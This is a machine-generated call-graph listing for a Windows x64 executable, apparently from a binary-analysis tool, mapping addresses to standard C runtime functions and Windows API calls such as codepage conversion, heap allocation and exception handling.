7ff74500649d 18614 7ff745012948 __uncaught_exceptions 9 API calls 18613->18614 18615 7ff7450064a2 18614->18615 18615->18607 18616 7ff745006550 37 API calls 18615->18616 18616->18607 18617 7ff7450064f3 18618 7ff745001e70 37 API calls 18617->18618 18619 7ff745006535 18618->18619 18620 7ff7450155d0 Concurrency::cancel_current_task 2 API calls 18619->18620 18621 7ff745006546 18620->18621 18622->18144 18623 7ff745015678 18622->18623 18656 7ff745015a20 18623->18656 18627 7ff745006599 18626->18627 18628 7ff745006567 18626->18628 18627->18147 18628->18627 18629 7ff745001e70 37 API calls 18628->18629 18630 7ff7450065df 18629->18630 18631 7ff7450155d0 Concurrency::cancel_current_task 2 API calls 18630->18631 18632 7ff7450065f0 18631->18632 18634 7ff74501a094 18633->18634 18637 7ff745019db4 18634->18637 18636 7ff74501a0b2 18636->18605 18638 7ff745019e01 18637->18638 18639 7ff745019dd4 18637->18639 18638->18636 18639->18638 18640 7ff745019e09 18639->18640 18641 7ff745019dde 18639->18641 18644 7ff745019cf4 18640->18644 18642 7ff74501af40 _invalid_parameter_noinfo_noreturn 35 API calls 18641->18642 18642->18638 18651 7ff745019ca8 EnterCriticalSection 18644->18651 18646 7ff745019d11 18647 7ff745019d34 65 API calls 18646->18647 18648 7ff745019d1a 18647->18648 18649 7ff745019cb4 _fread_nolock LeaveCriticalSection 18648->18649 18650 7ff745019d25 18649->18650 18650->18638 18653 7ff745005b19 18652->18653 18654 7ff745005b2e 18653->18654 18655 7ff7450063f0 46 API calls 18653->18655 18654->18613 18654->18617 18655->18654 18657 7ff745015a37 GetLastError 18656->18657 18658 7ff745015681 18656->18658 18661 7ff745018f1c 18657->18661 18658->18144 18662 7ff745018d3c __vcrt_FlsAlloc 5 API calls 18661->18662 18663 7ff745018f43 TlsGetValue 18662->18663 18666 7ff745005c73 18665->18666 18667 7ff745005d22 18665->18667 18666->18667 18673 7ff745005c7d 18666->18673 18668 7ff7450136e0 std::_Xinvalid_argument 8 API calls 18667->18668 18669 7ff745005d31 18668->18669 18669->18156 18670 7ff745005cc1 18671 7ff7450136e0 std::_Xinvalid_argument 8 API calls 18670->18671 18672 7ff745005cde 18671->18672 18672->18156 18673->18670 18674 7ff74501a064 67 API calls 18673->18674 18674->18670 18677 7ff745008516 18675->18677 18688 7ff7450085e4 18675->18688 18676 7ff745001210 37 API calls 18678 7ff7450085ea 18676->18678 18679 7ff74500854c 18677->18679 18680 7ff74500851c ctype 18677->18680 18681 7ff7450085a5 18677->18681 18682 7ff745013708 std::_Facet_Register 37 API calls 18679->18682 18683 7ff7450085de 18679->18683 18680->18166 18684 7ff745013708 std::_Facet_Register 37 API calls 18681->18684 18685 7ff745008562 18682->18685 18686 7ff745001170 Concurrency::cancel_current_task 37 API calls 18683->18686 18684->18680 18685->18680 18687 7ff74501b018 _invalid_parameter_noinfo_noreturn 35 API calls 18685->18687 18686->18688 18687->18683 18688->18676 18692 7ff74500151a 18689->18692 18690 7ff7450016ae 18691 7ff745001210 37 API calls 18690->18691 18697 7ff7450016b4 __std_exception_destroy numpunct 18691->18697 18692->18690 18693 7ff74500155e 18692->18693 18695 7ff7450015be 18692->18695 18696 7ff745001536 ctype 18692->18696 18694 7ff745013708 std::_Facet_Register 37 API calls 18693->18694 18704 7ff7450016a8 18693->18704 18694->18696 18698 7ff745013708 std::_Facet_Register 37 API calls 18695->18698 18700 7ff74501538c __std_exception_copy 35 API calls 18696->18700 18701 7ff7450016a3 18696->18701 18697->18169 18698->18696 18699 7ff745001170 Concurrency::cancel_current_task 37 API calls 18699->18690 18705 7ff745001630 18700->18705 18702 7ff74501b018 _invalid_parameter_noinfo_noreturn 35 API calls 18701->18702 18702->18704 18703 7ff74500166e numpunct 18706 7ff7450136e0 std::_Xinvalid_argument 8 API calls 18703->18706 18704->18699 18705->18701 18705->18703 18707 7ff745001695 18706->18707 18707->18169 18709 7ff7450083ae 18708->18709 18714 7ff745008279 18708->18714 18710 7ff745001210 37 API calls 18709->18710 18711 7ff7450083b4 18710->18711 18712 7ff74500831e 18715 7ff745013708 std::_Facet_Register 37 API calls 18712->18715 18713 7ff7450082f2 18717 7ff745013708 std::_Facet_Register 37 API calls 18713->18717 18720 7ff7450083a8 18713->18720 18714->18712 18714->18713 18718 7ff7450082d7 ctype 18714->18718 18714->18720 18715->18718 18716 7ff745001170 Concurrency::cancel_current_task 37 API calls 18716->18709 18717->18718 18719 7ff74501b018 _invalid_parameter_noinfo_noreturn 35 API calls 18718->18719 18721 7ff745008370 ctype numpunct 18718->18721 18719->18720 18720->18716 18721->18023 18723 7ff7450081ee 18722->18723 18724 7ff74500893c 18722->18724 18723->18056 18723->18057 18724->18723 18725 7ff745013708 std::_Facet_Register 37 API calls 18724->18725 18726 7ff74500894f 18725->18726 18727 7ff7450126ac std::_Lockit::_Lockit 39 API calls 18726->18727 18728 7ff745008980 18727->18728 18729 7ff7450089bc 18728->18729 18730 7ff745008a76 18728->18730 18731 7ff745012c5c std::_Locinfo::_Locinfo_ctor 68 API calls 18729->18731 18732 7ff745012924 37 API calls 18730->18732 18733 7ff7450089c8 18731->18733 18734 7ff745008a82 18732->18734 18738 7ff745012cc8 18733->18738 18736 7ff7450089e3 18737 7ff745012724 std::_Lockit::~_Lockit LeaveCriticalSection 18736->18737 18737->18723 18739 7ff745012cdc 18738->18739 18740 7ff745012cd5 18738->18740 18739->18736 18741 7ff74501b5c8 std::_Locinfo::_Locinfo_ctor 68 API calls 18740->18741 18741->18739 18743 7ff74501ff80 _Getctype 36 API calls 18742->18743 18744 7ff74501efe9 18743->18744 18745 7ff74501c108 BuildCatchObjectHelperInternal 36 API calls 18744->18745 18746 7ff74501effe 18745->18746 17606 7ff74502b688 17609 7ff745026bfc 17606->17609 17610 7ff745026c09 17609->17610 17611 7ff745026c4e 17609->17611 17615 7ff74501ff9c 17610->17615 17616 7ff74501ffb8 FlsGetValue 17615->17616 17618 7ff74501ffb4 17615->17618 17616->17618 17617 7ff74501ffce 17619 7ff74501ffd3 17617->17619 17646 7ff74501c108 17617->17646 17618->17617 17618->17619 17621 7ff74501fe60 _set_fmode 13 API calls 17618->17621 17623 7ff7450268d4 17619->17623 17621->17617 17696 7ff745026b44 17623->17696 17630 7ff74502693f 17631 7ff745021270 __free_lconv_mon 13 API calls 17630->17631 17644 7ff745026926 17631->17644 17632 7ff74502694e 17632->17632 17721 7ff745026c78 17632->17721 17635 7ff745026a4a 17636 7ff74501b1d0 _set_fmode 13 API calls 17635->17636 17637 7ff745026a4f 17636->17637 17640 7ff745021270 __free_lconv_mon 13 API calls 17637->17640 17638 7ff745026aa5 17639 7ff745026b0c 17638->17639 17732 7ff7450263f4 17638->17732 17643 7ff745021270 __free_lconv_mon 13 API calls 17639->17643 17640->17644 17641 7ff745026a64 17641->17638 17645 7ff745021270 __free_lconv_mon 13 API calls 17641->17645 17643->17644 17644->17611 17645->17638 17655 7ff7450256a4 17646->17655 17681 7ff74502565c 17655->17681 17686 7ff74501b23c EnterCriticalSection 17681->17686 17697 7ff745026b67 17696->17697 17699 7ff745026b71 17697->17699 17747 7ff74501b23c EnterCriticalSection 17697->17747 17701 7ff745026909 17699->17701 17703 7ff74501c108 BuildCatchObjectHelperInternal 36 API calls 17699->17703 17707 7ff7450265c4 17701->17707 17705 7ff745026bfb 17703->17705 17748 7ff74501bfe8 17707->17748 17710 7ff7450265e4 GetOEMCP 17712 7ff74502660b 17710->17712 17711 7ff7450265f6 17711->17712 17713 7ff7450265fb GetACP 17711->17713 17712->17644 17714 7ff745023880 17712->17714 17713->17712 17715 7ff7450238cb 17714->17715 17716 7ff74502388f std::_Locinfo::_Locinfo_ctor 17714->17716 17718 7ff74501b1d0 _set_fmode 13 API calls 17715->17718 17716->17715 17717 7ff7450238b2 HeapAlloc 17716->17717 17720 7ff74501c370 std::_Facet_Register 2 API calls 17716->17720 17717->17716 17719 7ff7450238c9 17717->17719 17718->17719 17719->17630 17719->17632 17720->17716 17722 7ff7450265c4 38 API calls 17721->17722 17723 7ff745026cb3 17722->17723 17724 7ff745026e09 17723->17724 17726 7ff745026cf0 IsValidCodePage 17723->17726 17730 7ff745026d0a __scrt_get_show_window_mode 17723->17730 17725 7ff7450136e0 std::_Xinvalid_argument 8 API calls 17724->17725 17727 7ff745026a41 17725->17727 17726->17724 17728 7ff745026d01 17726->17728 17727->17635 17727->17641 17729 7ff745026d30 GetCPInfo 17728->17729 17728->17730 17729->17724 17729->17730 17780 7ff7450266dc 17730->17780 17871 7ff74501b23c EnterCriticalSection 17732->17871 17749 7ff74501c00c 17748->17749 17755 7ff74501c007 17748->17755 17750 7ff74501ff80 _Getctype 36 API calls 17749->17750 17749->17755 17751 7ff74501c027 17750->17751 17756 7ff745022280 17751->17756 17755->17710 17755->17711 17757 7ff74501c04a 17756->17757 17758 7ff745022295 17756->17758 17760 7ff7450222ec 17757->17760 17758->17757 17764 7ff745028914 17758->17764 17761 7ff745022314 17760->17761 17762 7ff745022301 17760->17762 17761->17755 17762->17761 17777 7ff745026c5c 17762->17777 17765 7ff74501ff80 _Getctype 36 API calls 17764->17765 17766 7ff745028923 17765->17766 17767 7ff74502896e 17766->17767 17776 7ff74501b23c EnterCriticalSection 17766->17776 17767->17757 17778 7ff74501ff80 _Getctype 36 API calls 17777->17778 17779 7ff745026c65 17778->17779 17781 7ff745026727 GetCPInfo 17780->17781 17790 7ff74502681d 17780->17790 17787 7ff74502673a 17781->17787 17781->17790 17782 7ff7450136e0 std::_Xinvalid_argument 8 API calls 17783 7ff7450268bc 17782->17783 17783->17724 17791 7ff745024998 17787->17791 17789 7ff745024e5c 42 API calls 17789->17790 17790->17782 17792 7ff74501bfe8 TranslateName 36 API calls 17791->17792 17793 7ff7450249da 17792->17793 17811 7ff745025950 17793->17811 17795 7ff745024a17 17798 7ff7450136e0 std::_Xinvalid_argument 8 API calls 17795->17798 17796 7ff745024a10 17796->17795 17797 7ff745023880 std::_Locinfo::_Locinfo_ctor 14 API calls 17796->17797 17799 7ff745024ad4 17796->17799 17802 7ff745024a40 std::_Locinfo::_Locinfo_ctor __scrt_get_show_window_mode 17796->17802 17797->17802 17800 7ff745024b0d 17798->17800 17799->17795 17801 7ff745021270 __free_lconv_mon 13 API calls 17799->17801 17806 7ff745024e5c 17800->17806 17801->17795 17802->17799 17803 7ff745025950 _fread_nolock MultiByteToWideChar 17802->17803 17804 7ff745024ab6 17803->17804 17804->17799 17805 7ff745024aba GetStringTypeW 17804->17805 17805->17799 17807 7ff74501bfe8 TranslateName 36 API calls 17806->17807 17808 7ff745024e81 17807->17808 17814 7ff745024b28 17808->17814 17813 7ff745025959 MultiByteToWideChar 17811->17813 17815 7ff745024b69 17814->17815 17816 7ff745025950 _fread_nolock MultiByteToWideChar 17815->17816 17819 7ff745024bb3 17816->17819 17817 7ff745024e31 17818 7ff7450136e0 std::_Xinvalid_argument 8 API calls 17817->17818 17820 7ff745024e3f 17818->17820 17819->17817 17821 7ff745023880 std::_Locinfo::_Locinfo_ctor 14 API calls 17819->17821 17823 7ff745024beb std::_Locinfo::_Locinfo_ctor 17819->17823 17833 7ff745024ce9 17819->17833 17820->17789 17821->17823 17822 7ff745021270 __free_lconv_mon 13 API calls 17822->17817 17824 7ff745025950 _fread_nolock MultiByteToWideChar 17823->17824 17823->17833 17825 7ff745024c5e 17824->17825 17825->17833 17845 7ff745021e00 17825->17845 17828 7ff745024cfa 17831 7ff745023880 std::_Locinfo::_Locinfo_ctor 14 API calls 17828->17831 17832 7ff745024dcc 17828->17832 17835 7ff745024d18 std::_Locinfo::_Locinfo_ctor 17828->17835 17829 7ff745024ca9 17830 7ff745021e00 __crtLCMapStringW 39 API calls 17829->17830 17829->17833 17830->17833 17831->17835 17832->17833 17834 7ff745021270 __free_lconv_mon 13 API calls 17832->17834 17833->17817 17833->17822 17834->17833 17835->17833 17836 7ff745021e00 __crtLCMapStringW 39 API calls 17835->17836 17837 7ff745024d98 17836->17837 17837->17832 17838 7ff745024db8 17837->17838 17839 7ff745024dce 17837->17839 17854 7ff7450259e0 17838->17854 17841 7ff7450259e0 std::_Locinfo::_Locinfo_ctor WideCharToMultiByte 17839->17841 17842 7ff745024dc6 17841->17842 17842->17832 17843 7ff745024de6 17842->17843 17843->17833 17844 7ff745021270 __free_lconv_mon 13 API calls 17843->17844 17844->17833 17846 7ff745021e2c 17845->17846 17847 7ff745021eab 17845->17847 17851 7ff745021e4f 17846->17851 17857 7ff745021924 17846->17857 17866 7ff745021ef4 17847->17866 17850 7ff745021eb5 LCMapStringW 17853 7ff745021edd 17850->17853 17851->17847 17852 7ff745021ea9 LCMapStringEx 17851->17852 17852->17847 17853->17828 17853->17829 17853->17833 17855 7ff745025a04 WideCharToMultiByte 17854->17855 17858 7ff745021a14 17857->17858 17870 7ff74501b23c EnterCriticalSection 17858->17870 17860 7ff745021a22 VirtualProtect 17861 7ff745021ad0 17860->17861 17862 7ff74501c108 BuildCatchObjectHelperInternal 36 API calls 17861->17862 17864 7ff745021ad5 17862->17864 17863 7ff745021b15 17863->17851 17864->17863 17865 7ff745021924 __crtLCMapStringW 36 API calls 17864->17865 17865->17863 17867 7ff745021f10 17866->17867 17869 7ff745021f32 __crtLCMapStringW 17866->17869 17868 7ff745021924 __crtLCMapStringW 37 API calls 17867->17868 17867->17869 17868->17869 17869->17850 19517 7ff74502d6ad 19518 7ff74502d6bd 19517->19518 19521 7ff745019cb4 LeaveCriticalSection 19518->19521 17872 7ff7450200cc 17877 7ff745022144 17872->17877 17874 7ff7450200d5 17875 7ff74501ffe0 _set_fmode 13 API calls 17874->17875 17876 7ff7450200f2 __vcrt_uninitialize_ptd 17874->17876 17875->17876 17878 7ff745022159 17877->17878 17879 7ff745022155 17877->17879 17878->17879 17880 7ff745021924 __crtLCMapStringW 37 API calls 17878->17880 17879->17874 17880->17879 18801 7ff745022114 VirtualProtect 20187 7ff74501fd48 20188 7ff74501fd62 20187->20188 20189 7ff74501fd4d 20187->20189 20193 7ff74501fd68 20189->20193 20194 7ff74501fdaa 20193->20194 20195 7ff74501fdb2 20193->20195 20196 7ff745021270 __free_lconv_mon 13 API calls 20194->20196 20197 7ff745021270 __free_lconv_mon 13 API calls 20195->20197 20196->20195 20198 7ff74501fdbf 20197->20198 20199 7ff745021270 __free_lconv_mon 13 API calls 20198->20199 20200 7ff74501fdcc 20199->20200 20201 7ff745021270 __free_lconv_mon 13 API calls 20200->20201 20202 7ff74501fdd9 20201->20202 20203 7ff745021270 __free_lconv_mon 13 API calls 20202->20203 20204 7ff74501fde6 20203->20204 20205 7ff745021270 __free_lconv_mon 13 API calls 20204->20205 20206 7ff74501fdf3 20205->20206 20207 7ff745021270 __free_lconv_mon 13 API calls 20206->20207 20208 7ff74501fe00 20207->20208 20209 7ff745021270 __free_lconv_mon 13 API calls 20208->20209 20210 7ff74501fe0d 20209->20210 20211 7ff745021270 __free_lconv_mon 13 API calls 20210->20211 20212 7ff74501fe1d 20211->20212 20213 7ff745021270 __free_lconv_mon 13 API calls 20212->20213 20214 7ff74501fe2d 20213->20214 20219 7ff74501fc18 20214->20219 20233 7ff74501b23c EnterCriticalSection 20219->20233 17395 7ff745013778 17396 7ff745013788 17395->17396 17412 7ff74501cfe0 17396->17412 17398 7ff745013794 17418 7ff745013da4 17398->17418 17401 7ff7450137ac _RTC_Initialize 17410 7ff745013801 17401->17410 17423 7ff745013f54 17401->17423 17402 7ff74501382d 17404 7ff7450137c1 17426 7ff74501c828 17404->17426 17408 7ff7450137d6 17409 7ff74501d6ac 36 API calls 17408->17409 17409->17410 17411 7ff74501381d 17410->17411 17450 7ff7450143fc IsProcessorFeaturePresent 17410->17450 17413 7ff74501cff1 17412->17413 17417 7ff74501cff9 17413->17417 17457 7ff74501b1d0 17413->17457 17417->17398 17419 7ff745013db5 17418->17419 17422 7ff745013dba __scrt_release_startup_lock 17418->17422 17420 7ff7450143fc 7 API calls 17419->17420 17419->17422 17421 7ff745013e2e 17420->17421 17422->17401 17585 7ff745013f18 17423->17585 17425 7ff745013f5d 17425->17404 17427 7ff74501c848 17426->17427 17428 7ff7450137cd 17426->17428 17429 7ff74501c850 17427->17429 17430 7ff74501c866 GetModuleFileNameW 17427->17430 17428->17410 17449 7ff7450143a4 InitializeSListHead 17428->17449 17431 7ff74501b1d0 _set_fmode 13 API calls 17429->17431 17434 7ff74501c891 17430->17434 17432 7ff74501c855 17431->17432 17433 7ff74501aff8 _invalid_parameter_noinfo 35 API calls 17432->17433 17433->17428 17600 7ff74501c7c8 17434->17600 17437 7ff74501c8d9 17438 7ff74501b1d0 _set_fmode 13 API calls 17437->17438 17446 7ff74501c8de 17438->17446 17439 7ff74501c8ea 17441 7ff74501c94f 17439->17441 17442 7ff74501c936 17439->17442 17439->17446 17440 7ff745021270 __free_lconv_mon 13 API calls 17440->17428 17444 7ff745021270 __free_lconv_mon 13 API calls 17441->17444 17443 7ff745021270 __free_lconv_mon 13 API calls 17442->17443 17445 7ff74501c93f 17443->17445 17444->17446 17447 7ff745021270 __free_lconv_mon 13 API calls 17445->17447 17446->17440 17448 7ff74501c94b 17447->17448 17448->17428 17451 7ff745014422 _invalid_parameter_noinfo_noreturn __scrt_get_show_window_mode 17450->17451 17452 7ff745014441 RtlCaptureContext RtlLookupFunctionEntry 17451->17452 17453 7ff74501446a RtlVirtualUnwind 17452->17453 17454 7ff7450144a6 __scrt_get_show_window_mode 17452->17454 17453->17454 17455 7ff7450144d8 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17454->17455 17456 7ff745014526 _invalid_parameter_noinfo_noreturn 17455->17456 17456->17402 17463 7ff74501ffe0 17457->17463 17460 7ff74501aff8 17531 7ff74501aea4 17460->17531 17462 7ff74501b011 17462->17417 17464 7ff745020029 GetLastError 17463->17464 17468 7ff74501ffff _set_fmode 17463->17468 17465 7ff74502003c 17464->17465 17466 7ff74502005a SetLastError 17465->17466 17469 7ff745020057 17465->17469 17471 7ff74501fe60 _set_fmode 11 API calls 17465->17471 17467 7ff74501b1d9 17466->17467 17467->17460 17468->17467 17472 7ff74501fe60 GetLastError 17468->17472 17469->17466 17471->17469 17473 7ff74501fe86 17472->17473 17474 7ff74501fe8c SetLastError 17473->17474 17490 7ff7450203c0 17473->17490 17475 7ff74501ff05 17474->17475 17475->17467 17478 7ff74501fec5 FlsSetValue 17481 7ff74501fee8 17478->17481 17482 7ff74501fed1 FlsSetValue 17478->17482 17479 7ff74501feb5 FlsSetValue 17497 7ff745021270 17479->17497 17503 7ff74501fc78 17481->17503 17485 7ff745021270 __free_lconv_mon 7 API calls 17482->17485 17487 7ff74501fee6 SetLastError 17485->17487 17487->17475 17495 7ff7450203d1 std::_Locinfo::_Locinfo_ctor 17490->17495 17491 7ff745020422 17494 7ff74501b1d0 _set_fmode 12 API calls 17491->17494 17492 7ff745020406 HeapAlloc 17493 7ff74501fea7 17492->17493 17492->17495 17493->17478 17493->17479 17494->17493 17495->17491 17495->17492 17508 7ff74501c370 17495->17508 17498 7ff745021275 HeapFree 17497->17498 17500 7ff74501fec3 17497->17500 17499 7ff745021290 GetLastError 17498->17499 17498->17500 17501 7ff74502129d __free_lconv_mon 17499->17501 17500->17474 17502 7ff74501b1d0 _set_fmode 11 API calls 17501->17502 17502->17500 17517 7ff74501fb50 17503->17517 17511 7ff74501c3c0 17508->17511 17516 7ff74501b23c EnterCriticalSection 17511->17516 17529 7ff74501b23c EnterCriticalSection 17517->17529 17532 7ff74501aecf 17531->17532 17535 7ff74501af40 17532->17535 17534 7ff74501aef6 17534->17462 17545 7ff74501ac74 17535->17545 17541 7ff74501af7b 17541->17534 17546 7ff74501accb 17545->17546 17547 7ff74501ac90 GetLastError 17545->17547 17546->17541 17551 7ff74501ace0 17546->17551 17548 7ff74501aca0 17547->17548 17558 7ff745020070 17548->17558 17552 7ff74501acfc GetLastError SetLastError 17551->17552 17553 7ff74501ad14 17551->17553 17552->17553 17553->17541 17554 7ff74501b048 IsProcessorFeaturePresent 17553->17554 17555 7ff74501b05b 17554->17555 17563 7ff74501ad2c 17555->17563 17559 7ff745020098 FlsGetValue 17558->17559 17561 7ff745020094 17558->17561 17559->17561 17560 7ff74501acbb SetLastError 17560->17546 17561->17560 17562 7ff74501fe60 _set_fmode 13 API calls 17561->17562 17562->17560 17564 7ff74501ad66 _invalid_parameter_noinfo_noreturn __scrt_get_show_window_mode 17563->17564 17565 7ff74501ad8e RtlCaptureContext RtlLookupFunctionEntry 17564->17565 17566 7ff74501adda RtlVirtualUnwind 17565->17566 17567 7ff74501ae10 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17565->17567 17566->17567 17570 7ff74501ae62 _invalid_parameter_noinfo_noreturn 17567->17570 17571 7ff7450136e0 17570->17571 17572 7ff7450136e9 17571->17572 17573 7ff7450136f4 GetCurrentProcess TerminateProcess 17572->17573 17574 7ff745014084 IsProcessorFeaturePresent 17572->17574 17575 7ff74501409c 17574->17575 17580 7ff74501427c RtlCaptureContext 17575->17580 17581 7ff745014296 RtlLookupFunctionEntry 17580->17581 17582 7ff7450142ac RtlVirtualUnwind 17581->17582 17583 7ff7450140af 17581->17583 17582->17581 17582->17583 17584 7ff745014050 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17583->17584 17586 7ff745013f32 17585->17586 17588 7ff745013f2b 17585->17588 17589 7ff74501ee20 17586->17589 17588->17425 17592 7ff74501ea64 17589->17592 17599 7ff74501b23c EnterCriticalSection 17592->17599 17601 7ff74501c818 17600->17601 17602 7ff74501c7e0 17600->17602 17601->17437 17601->17439 17602->17601 17603 7ff7450203c0 _set_fmode 13 API calls 17602->17603 17604 7ff74501c80e 17603->17604 17605 7ff745021270 __free_lconv_mon 13 API calls 17604->17605 17605->17601 20409 7ff745004d90 20410 7ff745004dc7 20409->20410 20412 7ff745004e42 20410->20412 20413 7ff745004e5d 20410->20413 20418 7ff745004dd7 numpunct 20410->20418 20411 7ff7450136e0 std::_Xinvalid_argument 8 API calls 20415 7ff745004fee 20411->20415 20427 7ff7450199bc 20412->20427 20414 7ff7450199bc 38 API calls 20413->20414 20422 7ff745004e7d ctype 20414->20422 20417 7ff745004fa0 20417->20418 20420 7ff745005067 20417->20420 20418->20411 20421 7ff74501b018 _invalid_parameter_noinfo_noreturn 35 API calls 20420->20421 20425 7ff74500506c 20421->20425 20422->20417 20423 7ff7450199bc 38 API calls 20422->20423 20426 7ff74500501e 20422->20426 20448 7ff7450085f0 20422->20448 20423->20422 20426->20417 20462 7ff74501a4f8 20426->20462 20428 7ff7450199d8 20427->20428 20429 7ff7450199f6 20427->20429 20430 7ff74501b1d0 _set_fmode 13 API calls 20428->20430 20474 7ff745019ca8 EnterCriticalSection 20429->20474 20432 7ff7450199dd 20430->20432 20434 7ff74501aff8 _invalid_parameter_noinfo 35 API calls 20432->20434 20435 7ff7450199e8 20434->20435 20435->20418 20449 7ff745008750 20448->20449 20452 7ff74500861f 20448->20452 20450 7ff745001210 37 API calls 20449->20450 20451 7ff745008756 20450->20451 20454 7ff745008677 20452->20454 20455 7ff7450086b3 20452->20455 20460 7ff74500866a ctype 20452->20460 20453 7ff745013708 std::_Facet_Register 37 API calls 20453->20460 20454->20453 20457 7ff74500874a 20454->20457 20456 7ff745013708 std::_Facet_Register 37 API calls 20455->20456 20456->20460 20459 7ff745001170 Concurrency::cancel_current_task 37 API calls 20457->20459 20458 7ff74501b018 _invalid_parameter_noinfo_noreturn 35 API calls 20458->20457 20459->20449 20460->20458 20461 7ff745008706 ctype numpunct 20460->20461 20461->20422 20463 7ff74501a52f 20462->20463 20464 7ff74501a511 20462->20464 20475 7ff745019ca8 EnterCriticalSection 20463->20475 20465 7ff74501b1d0 _set_fmode 13 API calls 20464->20465 20467 7ff74501a516 20465->20467 20469 7ff74501aff8 _invalid_parameter_noinfo 35 API calls 20467->20469 20471 7ff74501a521 20469->20471 20471->20426 20476 7ff745004990 20477 7ff7450049c3 20476->20477 20478 7ff745005c50 67 API calls 20477->20478 20485 7ff745004a1b 20477->20485 20480 7ff7450049e6 20478->20480 20479 7ff7450136e0 std::_Xinvalid_argument 8 API calls 20481 7ff745004a89 20479->20481 20482 7ff745004a06 20480->20482 20480->20485 20486 7ff74501ab40 20480->20486 20482->20485 20490 7ff74501a118 20482->20490 20485->20479 20487 7ff74501ab70 20486->20487 20488 7ff74501a8bc 64 API calls 20487->20488 20489 7ff74501ab89 20488->20489 20489->20482 20491 7ff74501a12c 20490->20491 20492 7ff74501a141 20490->20492 20493 7ff74501b1d0 _set_fmode 13 API calls 20491->20493 20492->20491 20494 7ff74501a146 20492->20494 20496 7ff74501a131 20493->20496 20499 7ff7450229a4 20494->20499 20498 7ff74501aff8 _invalid_parameter_noinfo 35 API calls 20496->20498 20497 7ff74501a13c 20497->20485 20498->20497 20500 7ff7450229d4 20499->20500 20503 7ff7450224ac 20500->20503 20502 7ff7450229ed 20502->20497 20504 7ff7450224c7 20503->20504 20505 7ff7450224f6 20503->20505 20506 7ff74501af40 _invalid_parameter_noinfo_noreturn 35 API calls 20504->20506 20513 7ff745019ca8 EnterCriticalSection 20505->20513 20508 7ff7450224e7 20506->20508 20508->20502 18802 7ff74501cdb6 18803 7ff74501efe0 __GSHandlerCheck_EH 36 API calls 18802->18803 18804 7ff74501cdbb 18803->18804 18805 7ff74501ce2b 18804->18805 18806 7ff74501cde1 GetModuleHandleW 18804->18806 18814 7ff74501ccc4 18805->18814 18806->18805 18810 7ff74501cdee 18806->18810 18808 7ff74501ce8c 18809 7ff74501ce67 18809->18808 18821 7ff74501cea0 18809->18821 18810->18805 18826 7ff74501ced0 GetModuleHandleExW 18810->18826 18832 7ff74501b23c EnterCriticalSection 18814->18832 18816 7ff74501cce0 18817 7ff74501ccfc 13 API calls 18816->18817 18818 7ff74501cce9 18817->18818 18819 7ff74501b290 std::_Locinfo::_Locinfo_ctor LeaveCriticalSection 18818->18819 18820 7ff74501ccf1 18819->18820 18820->18809 18822 7ff74501ceac GetCurrentProcess TerminateProcess 18821->18822 18823 7ff74501cebd 18821->18823 18822->18823 18824 7ff74501ced0 3 API calls 18823->18824 18825 7ff74501cec4 ExitProcess 18824->18825 18827 7ff74501cf22 18826->18827 18828 7ff74501cf04 GetProcAddress 18826->18828 18830 7ff74501cf27 FreeLibrary 18827->18830 18831 7ff74501cf2e 18827->18831 18829 7ff74501cf16 18828->18829 18829->18827 18830->18831 18831->18805 18747 7ff74501c9a4 18748 7ff74501c9bd 18747->18748 18759 7ff74501c9b9 18747->18759 18760 7ff745026f68 GetEnvironmentStringsW 18748->18760 18751 7ff74501c9ca 18753 7ff745021270 __free_lconv_mon 13 API calls 18751->18753 18752 7ff74501c9d6 18767 7ff74501ca14 18752->18767 18753->18759 18756 7ff745021270 __free_lconv_mon 13 API calls 18757 7ff74501c9fd 18756->18757 18758 7ff745021270 __free_lconv_mon 13 API calls 18757->18758 18758->18759 18761 7ff74501c9c2 18760->18761 18762 7ff745026f8c 18760->18762 18761->18751 18761->18752 18763 7ff745023880 std::_Locinfo::_Locinfo_ctor 14 API calls 18762->18763 18764 7ff745026fc3 ctype 18763->18764 18765 7ff745021270 __free_lconv_mon 13 API calls 18764->18765 18766 7ff745026fe3 FreeEnvironmentStringsW 18765->18766 18766->18761 18768 7ff74501ca3c 18767->18768 18769 7ff7450203c0 _set_fmode 13 API calls 18768->18769 18782 7ff74501ca77 18769->18782 18770 7ff74501ca7f 18771 7ff745021270 __free_lconv_mon 13 API calls 18770->18771 18773 7ff74501c9de 18771->18773 18772 7ff74501cae8 18774 7ff745021270 __free_lconv_mon 13 API calls 18772->18774 18773->18756 18774->18773 18775 7ff7450203c0 _set_fmode 13 API calls 18775->18782 18776 7ff74501cb0b 18795 7ff74501cb34 18776->18795 18780 7ff745021270 __free_lconv_mon 13 API calls 18780->18770 18781 7ff74501cb1f 18783 7ff74501b048 _invalid_parameter_noinfo_noreturn 17 API calls 18781->18783 18782->18770 18782->18772 18782->18775 18782->18776 18782->18781 18784 7ff745021270 __free_lconv_mon 13 API calls 18782->18784 18786 7ff745024ef4 18782->18786 18785 7ff74501cb31 18783->18785 18784->18782 18787 7ff745024f0b 18786->18787 18788 7ff745024f01 18786->18788 18789 7ff74501b1d0 _set_fmode 13 API calls 18787->18789 18788->18787 18793 7ff745024f27 18788->18793 18790 7ff745024f13 18789->18790 18791 7ff74501aff8 _invalid_parameter_noinfo 35 API calls 18790->18791 18792 7ff745024f1f 18791->18792 18792->18782 18793->18792 18794 7ff74501b1d0 _set_fmode 13 API calls 18793->18794 18794->18790 18796 7ff74501cb39 18795->18796 18797 7ff74501cb13 18795->18797 18798 7ff74501cb62 18796->18798 18799 7ff745021270 __free_lconv_mon 13 API calls 18796->18799 18797->18780 18800 7ff745021270 __free_lconv_mon 13 API calls 18798->18800 18799->18796 18800->18797 21008 7ff7450051d0 21010 7ff7450051f6 21008->21010 21013 7ff7450051fd 21008->21013 21009 7ff7450136e0 std::_Xinvalid_argument 8 API calls 21011 7ff745005358 21009->21011 21010->21009 21013->21010 21014 7ff7450052f7 21013->21014 21015 7ff745005283 21013->21015 21014->21010 21016 7ff74501a064 67 API calls 21014->21016 21015->21010 21017 7ff745019314 21015->21017 21016->21010 21018 7ff745019344 21017->21018 21021 7ff745019148 21018->21021 21020 7ff74501935d 21020->21010 21022 7ff74501916e 21021->21022 21023 7ff7450191a3 21021->21023 21024 7ff74501af40 _invalid_parameter_noinfo_noreturn 35 API calls 21022->21024 21039 7ff745019ca8 EnterCriticalSection 21023->21039 21038 7ff745019190 21024->21038 21038->21020 22125 7ff74502d7ee 22126 7ff74502d807 22125->22126 22127 7ff74502d7fd 22125->22127 22129 